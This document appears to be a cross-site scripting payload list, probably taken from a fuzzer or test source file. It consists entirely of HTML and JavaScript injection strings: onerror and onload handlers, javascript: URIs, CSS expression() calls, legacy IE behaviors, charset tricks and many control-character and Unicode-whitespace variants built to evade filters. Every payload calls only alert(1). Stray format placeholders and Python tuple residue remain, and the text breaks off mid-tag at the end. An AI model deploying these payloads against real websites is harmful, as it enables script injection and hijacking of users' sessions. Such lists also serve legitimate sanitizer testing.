+<img \x47src=x onerror="javascript:alert(1)"> +<img \x11src=x onerror="javascript:alert(1)"> +<img \x12src=x onerror="javascript:alert(1)"> +<img\x47src=x onerror="javascript:alert(1)"> +<img\x10src=x onerror="javascript:alert(1)"> +<img\x13src=x onerror="javascript:alert(1)"> +<img\x32src=x onerror="javascript:alert(1)"> +<img\x47src=x onerror="javascript:alert(1)"> +<img\x11src=x onerror="javascript:alert(1)"> +<img \x47src=x onerror="javascript:alert(1)"> +<img \x34src=x onerror="javascript:alert(1)"> +<img \x39src=x onerror="javascript:alert(1)"> +<img \x00src=x onerror="javascript:alert(1)"> +<img src\x09=x onerror="javascript:alert(1)"> +<img src\x10=x onerror="javascript:alert(1)"> +<img src\x13=x onerror="javascript:alert(1)"> +<img src\x32=x onerror="javascript:alert(1)"> +<img src\x12=x onerror="javascript:alert(1)"> +<img src\x11=x onerror="javascript:alert(1)"> +<img src\x00=x onerror="javascript:alert(1)"> +<img src\x47=x onerror="javascript:alert(1)"> +<img src=x\x09onerror="javascript:alert(1)"> +<img src=x\x10onerror="javascript:alert(1)"> +<img src=x\x11onerror="javascript:alert(1)"> +<img src=x\x12onerror="javascript:alert(1)"> +<img src=x\x13onerror="javascript:alert(1)"> +<img[a][b][c]src[d]=x[e]onerror=[f]"alert(1)"> +<img src=x onerror=\x09"javascript:alert(1)"> +<img src=x onerror=\x10"javascript:alert(1)"> +<img src=x onerror=\x11"javascript:alert(1)"> +<img src=x onerror=\x12"javascript:alert(1)"> +<img src=x onerror=\x32"javascript:alert(1)"> +<img src=x onerror=\x00"javascript:alert(1)"> +<a href=java&#1&#2&#3&#4&#5&#6&#7&#8&#11&#12script:javascript:alert(1)>XXX</a> +<img src="x` `<script>javascript:alert(1)</script>"` `> +<img src onerror /" '"= alt=javascript:alert(1)//"> +<title onpropertychange=javascript:alert(1)></title><title title=> +<a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(1)></a>"> +<!--[if]><script>javascript:alert(1)</script --> +<!--[if<img src=x onerror=javascript:alert(1)//]> --> +<script src="/\%(jscript)s"></script> +<script src="\\%(jscript)s"></script> +<object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="javascript:alert(1)" style="behavior:url(#x);"><param name=postdomevents /></object> +<a style="-o-link:'javascript:javascript:alert(1)';-o-link-source:current">X +<style>p[foo=bar{}*{-o-link:'javascript:javascript:alert(1)'}{}*{-o-link-source:current}]{color:red};</style> +<link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(1))%7d +<style>@import "data:,*%7bx:expression(javascript:alert(1))%7D";</style> +<a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="javascript:alert(1);">XXX</a></a><a href="javascript:javascript:alert(1)">XXX</a> +<style>*[{}@import'%(css)s?]</style>X +<div style="font-family:'foo&#10;;color:red;';">XXX +<div style="font-family:foo}color=red;">XXX +<// style=x:expression\28javascript:alert(1)\29> +<style>*{x:expression(javascript:alert(1))}</style> +<div style=content:url(%(svg)s)></div> +<div style="list-style:url(http://foo.f)\20url(javascript:javascript:alert(1));">X +<div id=d><div style="font-family:'sans\27\3B color\3Ared\3B'">X</div></div> <script>with(document.getElementById("d"))innerHTML=innerHTML</script> +<div style="background:url(/f#&#127;oo/;color:red/*/foo.jpg);">X +<div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X +<div id="x">XXX</div> <style> #x{font-family:foo[bar;color:green;} #y];color:red;{} </style> +<x style="background:url('x&#1;;color:red;/*')">XXX</x> +<script>({set/**/$($){_/**/setter=$,_=javascript:alert(1)}}).$=eval</script> +<script>({0:#0=eval/#0#/#0#(javascript:alert(1))})</script> +<script>ReferenceError.prototype.__defineGetter__('name', function(){javascript:alert(1)}),x</script> +<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:alert(1)')()</script> +<meta charset="x-imap4-modified-utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi +<meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&> +<meta charset="mac-farsi">¼script¾javascript:alert(1)¼/script¾ +X<x style=`behavior:url(#default#time2)` onbegin=`javascript:alert(1)` > +1<set/xmlns=`urn:schemas-microsoft-com:time` style=`beh&#x41vior:url(#default#time2)` attributename=`innerhtml` to=`&lt;img/src=&quot;x&quot;onerror=javascript:alert(1)&gt;`> +1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=&lt;img/src=&quot;.&quot;onerror=javascript:alert(1)&gt;> +<vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=%(vml)s#xss></vmlframe> +1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:javascript:alert(1) strokecolor=white strokeweight=1000px from=0 to=1000 /></a> +<a style="behavior:url(#default#AnchorClick);" folder="javascript:javascript:alert(1)">XXX</a> +<x style="behavior:url(%(sct)s)"> +<xml id="xss" src="%(htc)s"></xml> <label dataformatas="html" datasrc="#xss" datafld="payload"></label> +<event-source src="%(event)s" onload="javascript:alert(1)"> +<a href="javascript:javascript:alert(1)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A"> +<div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x" to="&lt;img&#11;src=x:x&#11;onerror&#11;=javascript:alert(1)&gt;"> +<script>%(payload)s</script> +<script src=%(jscript)s></script> +<script language='javascript' src='%(jscript)s'></script> +<script>javascript:alert(1)</script> +<IMG SRC="javascript:javascript:alert(1);"> +<IMG SRC=javascript:javascript:alert(1)> +<IMG SRC=`javascript:javascript:alert(1)`> +<SCRIPT SRC=%(jscript)s?<B> +<FRAMESET><FRAME SRC="javascript:javascript:alert(1);"></FRAMESET> +<BODY ONLOAD=javascript:alert(1)> +<BODY ONLOAD=javascript:javascript:alert(1)> +<IMG SRC="jav ascript:javascript:alert(1);"> +<BODY onload!#$%%&()*~+-_.,:;?@[/|\]^`=javascript:alert(1)> +<SCRIPT/SRC="%(jscript)s"></SCRIPT> +<<SCRIPT>%(payload)s//<</SCRIPT> +<IMG SRC="javascript:javascript:alert(1)" +<iframe src=%(scriptlet)s < +<INPUT TYPE="IMAGE" SRC="javascript:javascript:alert(1);"> +<IMG DYNSRC="javascript:javascript:alert(1)"> +<IMG LOWSRC="javascript:javascript:alert(1)"> +<BGSOUND SRC="javascript:javascript:alert(1);"> +<BR SIZE="&{javascript:alert(1)}"> +<LAYER SRC="%(scriptlet)s"></LAYER> +<LINK REL="stylesheet" HREF="javascript:javascript:alert(1);"> +<STYLE>@import'%(css)s';</STYLE> +<META HTTP-EQUIV="Link" Content="<%(css)s>; REL=stylesheet"> +<XSS STYLE="behavior: url(%(htc)s);"> +<STYLE>li {list-style-image: url("javascript:javascript:alert(1)");}</STYLE><UL><LI>XSS +<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:javascript:alert(1);"> +<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:javascript:alert(1);"> +<IFRAME SRC="javascript:javascript:alert(1);"></IFRAME> +<TABLE BACKGROUND="javascript:javascript:alert(1)"> +<TABLE><TD BACKGROUND="javascript:javascript:alert(1)"> +<DIV STYLE="background-image: url(javascript:javascript:alert(1))"> +<DIV STYLE="width:expression(javascript:alert(1));"> +<IMG STYLE="xss:expr/*XSS*/ession(javascript:alert(1))"> +<XSS STYLE="xss:expression(javascript:alert(1))"> +<STYLE TYPE="text/javascript">javascript:alert(1);</STYLE> +<STYLE>.XSS{background-image:url("javascript:javascript:alert(1)");}</STYLE><A CLASS=XSS></A> +<STYLE type="text/css">BODY{background:url("javascript:javascript:alert(1)")}</STYLE> +<!--[if gte IE 4]><SCRIPT>javascript:alert(1);</SCRIPT><![endif]--> +<BASE HREF="javascript:javascript:alert(1);//"> +<OBJECT TYPE="text/x-scriptlet" DATA="%(scriptlet)s"></OBJECT> +<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:javascript:alert(1)></OBJECT> +<HTML xmlns:xss><?import namespace="xss" implementation="%(htc)s"><xss:xss>XSS</xss:xss></HTML>""","XML namespace."),("""<XML ID="xss"><I><B>&lt;IMG SRC="javas<!-- -->cript:javascript:alert(1)"&gt;</B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN> +<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS&lt;SCRIPT DEFER&gt;javascript:alert(1)&lt;/SCRIPT&gt;"></BODY></HTML> +<SCRIPT SRC="%(jpg)s"></SCRIPT> +<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-%(payload)s;+ADw-/SCRIPT+AD4- +<form id="test" /><button form="test" formaction="javascript:javascript:alert(1)">X +<body onscroll=javascript:alert(1)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus> +<P STYLE="behavior:url('#default#time2')" end="0" onEnd="javascript:alert(1)"> +<STYLE>@import'%(css)s';</STYLE> +<STYLE>a{background:url('s1' 's2)}@import javascript:javascript:alert(1);');}</STYLE> +<meta charset= "x-imap4-modified-utf7"&&>&&<script&&>javascript:alert(1)&&;&&<&&/script&&> +<SCRIPT onreadystatechange=javascript:javascript:alert(1);></SCRIPT> +<style onreadystatechange=javascript:javascript:alert(1);></style> +<?xml version="1.0"?><html:html xmlns:html='http://www.w3.org/1999/xhtml'><html:script>javascript:alert(1);</html:script></html:html> +<embed code=%(scriptlet)s></embed> +<embed code=javascript:javascript:alert(1);></embed> +<embed src=%(jscript)s></embed> +<frameset onload=javascript:javascript:alert(1)></frameset> +script\x20type="text/javascript">javascript:alert(1);</script> +<script\x3Etype="text/javascript">javascript:alert(1);</script> +<script\x0Dtype="text/javascript">javascript:alert(1);</script> +<script\x09type="text/javascript">javascript:alert(1);</script> +<script\x0Ctype="text/javascript">javascript:alert(1);</script> +</script><script>alert(1);</script> +<script\x2Ftype="text/javascript">javascript:alert(1);</script> +<script\x0Atype="text/javascript">javascript:alert(1);</script> +'`"><\x3Cscript>javascript:alert(1)</script> +'`"><\x00script>javascript:alert(1)</script> +<img src=1 href=1 onerror="javascript:alert(1)"></img> +<audio src=1 href=1 onerror="javascript:alert(1)"></audio> +<video src=1 href=1 onerror="javascript:alert(1)"></video> +<body src=1 href=1 onerror="javascript:alert(1)"></body> +<image src=1 href=1 onerror="javascript:alert(1)"></image> +<object src=1 href=1 onerror="javascript:alert(1)"></object> +<script src=1 href=1 onerror="javascript:alert(1)"></script> +<svg onResize svg onResize="javascript:javascript:alert(1)"></svg onResize> +<title onPropertyChange title onPropertyChange="javascript:javascript:alert(1)"></title onPropertyChange> +<iframe onLoad iframe onLoad="javascript:javascript:alert(1)"></iframe onLoad> +<body onMouseEnter body onMouseEnter="javascript:javascript:alert(1)"></body onMouseEnter> +<body onFocus body onFocus="javascript:javascript:alert(1)"></body onFocus> +<frameset onScroll frameset onScroll="javascript:javascript:alert(1)"></frameset onScroll> +<script onReadyStateChange script onReadyStateChange="javascript:javascript:alert(1)"></script onReadyStateChange> +<html onMouseUp html onMouseUp="javascript:javascript:alert(1)"></html onMouseUp> +<body onPropertyChange body onPropertyChange="javascript:javascript:alert(1)"></body onPropertyChange> +<svg onLoad svg onLoad="javascript:javascript:alert(1)"></svg onLoad> +<body onPageHide body onPageHide="javascript:javascript:alert(1)"></body onPageHide> +<body onMouseOver body onMouseOver="javascript:javascript:alert(1)"></body onMouseOver> +<body onUnload body onUnload="javascript:javascript:alert(1)"></body onUnload> +<body onLoad body onLoad="javascript:javascript:alert(1)"></body onLoad> +<bgsound onPropertyChange bgsound onPropertyChange="javascript:javascript:alert(1)"></bgsound onPropertyChange> +<html onMouseLeave html onMouseLeave="javascript:javascript:alert(1)"></html onMouseLeave> +<html onMouseWheel html onMouseWheel="javascript:javascript:alert(1)"></html onMouseWheel> +<style onLoad style onLoad="javascript:javascript:alert(1)"></style onLoad> +<iframe onReadyStateChange iframe onReadyStateChange="javascript:javascript:alert(1)"></iframe onReadyStateChange> +<body onPageShow body onPageShow="javascript:javascript:alert(1)"></body onPageShow> +<style onReadyStateChange style onReadyStateChange="javascript:javascript:alert(1)"></style onReadyStateChange> +<frameset onFocus frameset onFocus="javascript:javascript:alert(1)"></frameset onFocus> +<applet onError applet onError="javascript:javascript:alert(1)"></applet onError> +<marquee onStart marquee onStart="javascript:javascript:alert(1)"></marquee onStart> +<script onLoad script onLoad="javascript:javascript:alert(1)"></script onLoad> +<html onMouseOver html onMouseOver="javascript:javascript:alert(1)"></html onMouseOver> +<html onMouseEnter html onMouseEnter="javascript:parent.javascript:alert(1)"></html onMouseEnter> +<body onBeforeUnload body onBeforeUnload="javascript:javascript:alert(1)"></body onBeforeUnload> +<html onMouseDown html onMouseDown="javascript:javascript:alert(1)"></html onMouseDown> +<marquee onScroll marquee onScroll="javascript:javascript:alert(1)"></marquee onScroll> +<xml onPropertyChange xml onPropertyChange="javascript:javascript:alert(1)"></xml onPropertyChange> +<frameset onBlur frameset onBlur="javascript:javascript:alert(1)"></frameset onBlur> +<applet onReadyStateChange applet onReadyStateChange="javascript:javascript:alert(1)"></applet onReadyStateChange> +<svg onUnload svg onUnload="javascript:javascript:alert(1)"></svg onUnload> +<html onMouseOut html onMouseOut="javascript:javascript:alert(1)"></html onMouseOut> +<body onMouseMove body onMouseMove="javascript:javascript:alert(1)"></body onMouseMove> +<body onResize body onResize="javascript:javascript:alert(1)"></body onResize> +<object onError object onError="javascript:javascript:alert(1)"></object onError> +<body onPopState body onPopState="javascript:javascript:alert(1)"></body onPopState> +<html onMouseMove html onMouseMove="javascript:javascript:alert(1)"></html onMouseMove> +<applet onreadystatechange applet onreadystatechange="javascript:javascript:alert(1)"></applet onreadystatechange> +<body onpagehide body onpagehide="javascript:javascript:alert(1)"></body onpagehide> +<svg onunload svg onunload="javascript:javascript:alert(1)"></svg onunload> +<applet onerror applet onerror="javascript:javascript:alert(1)"></applet onerror> +<body onkeyup body onkeyup="javascript:javascript:alert(1)"></body onkeyup> +<body onunload body onunload="javascript:javascript:alert(1)"></body onunload> +<iframe onload iframe onload="javascript:javascript:alert(1)"></iframe onload> +<body onload body onload="javascript:javascript:alert(1)"></body onload> +<html onmouseover html onmouseover="javascript:javascript:alert(1)"></html onmouseover> +<object onbeforeload object onbeforeload="javascript:javascript:alert(1)"></object onbeforeload> +<body onbeforeunload body onbeforeunload="javascript:javascript:alert(1)"></body onbeforeunload> +<body onfocus body onfocus="javascript:javascript:alert(1)"></body onfocus> +<body onkeydown body onkeydown="javascript:javascript:alert(1)"></body onkeydown> +<iframe onbeforeload iframe onbeforeload="javascript:javascript:alert(1)"></iframe onbeforeload> +<iframe src iframe src="javascript:javascript:alert(1)"></iframe src> +<svg onload svg onload="javascript:javascript:alert(1)"></svg onload> +<html onmousemove html onmousemove="javascript:javascript:alert(1)"></html onmousemove> +<body onblur body onblur="javascript:javascript:alert(1)"></body onblur> +\x3Cscript>javascript:alert(1)</script> +'"`><script>/* *\x2Fjavascript:alert(1)// */</script> +<script>javascript:alert(1)</script\x0D +<script>javascript:alert(1)</script\x0A +<script>javascript:alert(1)</script\x0B +<script charset="\x22>javascript:alert(1)</script> +<!--\x3E<img src=xxx:x onerror=javascript:alert(1)> --> +--><!-- ---> <img src=xxx:x onerror=javascript:alert(1)> --> +--><!-- --\x00> <img src=xxx:x onerror=javascript:alert(1)> --> +--><!-- --\x21> <img src=xxx:x onerror=javascript:alert(1)> --> +--><!-- --\x3E> <img src=xxx:x onerror=javascript:alert(1)> --> +`"'><img src='#\x27 onerror=javascript:alert(1)> +<a href="javascript\x3Ajavascript:alert(1)" id="fuzzelement1">test</a> +"'`><p><svg><script>a='hello\x27;javascript:alert(1)//';</script></p> +<a href="javas\x00cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x07cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x0Dcript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x0Acript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x08cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x02cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x03cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x04cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x01cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x05cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x0Bcript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x09cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x06cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x0Ccript:javascript:alert(1)" id="fuzzelement1">test</a> +<script>/* *\x2A/javascript:alert(1)// */</script> +<script>/* *\x00/javascript:alert(1)// */</script> +<style></style\x3E<img src="about:blank" onerror=javascript:alert(1)//></style> +<style></style\x0D<img src="about:blank" onerror=javascript:alert(1)//></style> +<style></style\x09<img src="about:blank" onerror=javascript:alert(1)//></style> +<style></style\x20<img src="about:blank" onerror=javascript:alert(1)//></style> +<style></style\x0A<img src="about:blank" onerror=javascript:alert(1)//></style> +"'`>ABC<div style="font-family:'foo'\x7Dx:expression(javascript:alert(1);/*';">DEF +"'`>ABC<div style="font-family:'foo'\x3Bx:expression(javascript:alert(1);/*';">DEF +<script>if("x\\xE1\x96\x89".length==2) { javascript:alert(1);}</script> +<script>if("x\\xE0\xB9\x92".length==2) { javascript:alert(1);}</script> +<script>if("x\\xEE\xA9\x93".length==2) { javascript:alert(1);}</script> +'`"><\x3Cscript>javascript:alert(1)</script> +'`"><\x00script>javascript:alert(1)</script> +"'`><\x3Cimg src=xxx:x onerror=javascript:alert(1)> +"'`><\x00img src=xxx:x onerror=javascript:alert(1)> +<script src="data:text/plain\x2Cjavascript:alert(1)"></script> +<script src="data:\xD4\x8F,javascript:alert(1)"></script> +<script src="data:\xE0\xA4\x98,javascript:alert(1)"></script> +<script src="data:\xCB\x8F,javascript:alert(1)"></script> +<script\x20type="text/javascript">javascript:alert(1);</script> +<script\x3Etype="text/javascript">javascript:alert(1);</script> +<script\x0Dtype="text/javascript">javascript:alert(1);</script> +<script\x09type="text/javascript">javascript:alert(1);</script> +<script\x0Ctype="text/javascript">javascript:alert(1);</script> +<script\x2Ftype="text/javascript">javascript:alert(1);</script> +<script\x0Atype="text/javascript">javascript:alert(1);</script> +ABC<div style="x\x3Aexpression(javascript:alert(1)">DEF +ABC<div style="x:expression\x5C(javascript:alert(1)">DEF +ABC<div style="x:expression\x00(javascript:alert(1)">DEF +ABC<div style="x:exp\x00ression(javascript:alert(1)">DEF +ABC<div style="x:exp\x5Cression(javascript:alert(1)">DEF +ABC<div style="x:\x0Aexpression(javascript:alert(1)">DEF +ABC<div style="x:\x09expression(javascript:alert(1)">DEF +ABC<div style="x:\xE3\x80\x80expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x84expression(javascript:alert(1)">DEF +ABC<div style="x:\xC2\xA0expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x80expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x8Aexpression(javascript:alert(1)">DEF +ABC<div style="x:\x0Dexpression(javascript:alert(1)">DEF +ABC<div style="x:\x0Cexpression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x87expression(javascript:alert(1)">DEF +ABC<div style="x:\xEF\xBB\xBFexpression(javascript:alert(1)">DEF +ABC<div style="x:\x20expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x88expression(javascript:alert(1)">DEF +ABC<div style="x:\x00expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x8Bexpression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x86expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x85expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x82expression(javascript:alert(1)">DEF +ABC<div style="x:\x0Bexpression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x81expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x83expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x89expression(javascript:alert(1)">DEF +<a href="\x0Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x0Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xC2\xA0javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x05javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE1\xA0\x8Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x18javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x11javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x88javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x89javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x17javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x03javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x0Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x00javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x10javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x82javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x20javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x13javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x09javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x8Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x14javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x19javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\xAFjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x81javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Djavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x87javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x07javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE1\x9A\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x83javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x04javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x01javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x08javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x84javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x86javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE3\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x12javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x0Djavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x0Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x0Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x15javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\xA8javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x16javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x02javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x06javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\xA9javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x85javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x81\x9Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javascript\x00:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javascript\x3A:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javascript\x09:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javascript\x0D:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javascript\x0A:javascript:alert(1)" id="fuzzelement1">test</a> +`"'><img src=xxx:x \x0Aonerror=javascript:alert(1)> +`"'><img src=xxx:x \x22onerror=javascript:alert(1)> +`"'><img src=xxx:x \x0Bonerror=javascript:alert(1)> +`"'><img src=xxx:x \x0Donerror=javascript:alert(1)> +`"'><img src=xxx:x \x2Fonerror=javascript:alert(1)> +`"'><img src=xxx:x \x09onerror=javascript:alert(1)> +`"'><img src=xxx:x \x0Conerror=javascript:alert(1)> +`"'><img src=xxx:x \x00onerror=javascript:alert(1)> +`"'><img src=xxx:x \x27onerror=javascript:alert(1)> +`"'><img src=xxx:x \x20onerror=javascript:alert(1)> +"`'><script>\x3Bjavascript:alert(1)</script> +"`'><script>\x0Djavascript:alert(1)</script> +"`'><script>\xEF\xBB\xBFjavascript:alert(1)</script> +"`'><script>\xE2\x80\x81javascript:alert(1)</script> +"`'><script>\xE2\x80\x84javascript:alert(1)</script> +"`'><script>\xE3\x80\x80javascript:alert(1)</script> +"`'><script>\x09javascript:alert(1)</script> +"`'><script>\xE2\x80\x89javascript:alert(1)</script> +"`'><script>\xE2\x80\x85javascript:alert(1)</script> +"`'><script>\xE2\x80\x88javascript:alert(1)</script> +"`'><script>\x00javascript:alert(1)</script> +"`'><script>\xE2\x80\xA8javascript:alert(1)</script> +"`'><script>\xE2\x80\x8Ajavascript:alert(1)</script> +"`'><script>\xE1\x9A\x80javascript:alert(1)</script> +"`'><script>\x0Cjavascript:alert(1)</script> +"`'><script>\x2Bjavascript:alert(1)</script> +"`'><script>\xF0\x90\x96\x9Ajavascript:alert(1)</script> +"`'><script>-javascript:alert(1)</script> +"`'><script>\x0Ajavascript:alert(1)</script> +"`'><script>\xE2\x80\xAFjavascript:alert(1)</script> +"`'><script>\x7Ejavascript:alert(1)</script> +"`'><script>\xE2\x80\x87javascript:alert(1)</script> +"`'><script>\xE2\x81\x9Fjavascript:alert(1)</script> +"`'><script>\xE2\x80\xA9javascript:alert(1)</script> +"`'><script>\xC2\x85javascript:alert(1)</script> +"`'><script>\xEF\xBF\xAEjavascript:alert(1)</script> +"`'><script>\xE2\x80\x83javascript:alert(1)</script> +"`'><script>\xE2\x80\x8Bjavascript:alert(1)</script> +"`'><script>\xEF\xBF\xBEjavascript:alert(1)</script> +"`'><script>\xE2\x80\x80javascript:alert(1)</script> +"`'><script>\x21javascript:alert(1)</script> +"`'><script>\xE2\x80\x82javascript:alert(1)</script> +"`'><script>\xE2\x80\x86javascript:alert(1)</script> +"`'><script>\xE1\xA0\x8Ejavascript:alert(1)</script> +"`'><script>\x0Bjavascript:alert(1)</script> +"`'><script>\x20javascript:alert(1)</script> +"`'><script>\xC2\xA0javascript:alert(1)</script> +"/><img/onerror=\x0Bjavascript:alert(1)\x0Bsrc=xxx:x /> +"/><img/onerror=\x22javascript:alert(1)\x22src=xxx:x /> +"/><img/onerror=\x09javascript:alert(1)\x09src=xxx:x /> +"/><img/onerror=\x27javascript:alert(1)\x27src=xxx:x /> +"/><img/onerror=\x0Ajavascript:alert(1)\x0Asrc=xxx:x /> +"/><img/onerror=\x0Cjavascript:alert(1)\x0Csrc=xxx:x /> +"/><img/onerror=\x0Djavascript:alert(1)\x0Dsrc=xxx:x /> +"/><img/onerror=\x60javascript:alert(1)\x60src=xxx:x /> +"/><img/onerror=\x20javascript:alert(1)\x20src=xxx:x /> +<script\x2F>javascript:alert(1)</script> +<script\x20>javascript:alert(1)</script> +<script\x0D>javascript:alert(1)</script> +<script\x0A>javascript:alert(1)</script> +<script\x0C>javascript:alert(1)</script> +<script\x00>javascript:alert(1)</script> +<script\x09>javascript:alert(1)</script> +`"'><img src=xxx:x onerror\x0B=javascript:alert(1)> +`"'><img src=xxx:x onerror\x00=javascript:alert(1)> +`"'><img src=xxx:x onerror\x0C=javascript:alert(1)> +`"'><img src=xxx:x onerror\x0D=javascript:alert(1)> +`"'><img src=xxx:x onerror\x20=javascript:alert(1)> +`"'><img src=xxx:x onerror\x0A=javascript:alert(1)> +`"'><img src=xxx:x onerror\x09=javascript:alert(1)> +<script>javascript:alert(1)<\x00/script> +<img src=# onerror\x3D"javascript:alert(1)" > +<input onfocus=javascript:alert(1) autofocus> +<input onblur=javascript:alert(1) autofocus><input autofocus> +<video poster=javascript:javascript:alert(1)// +<body 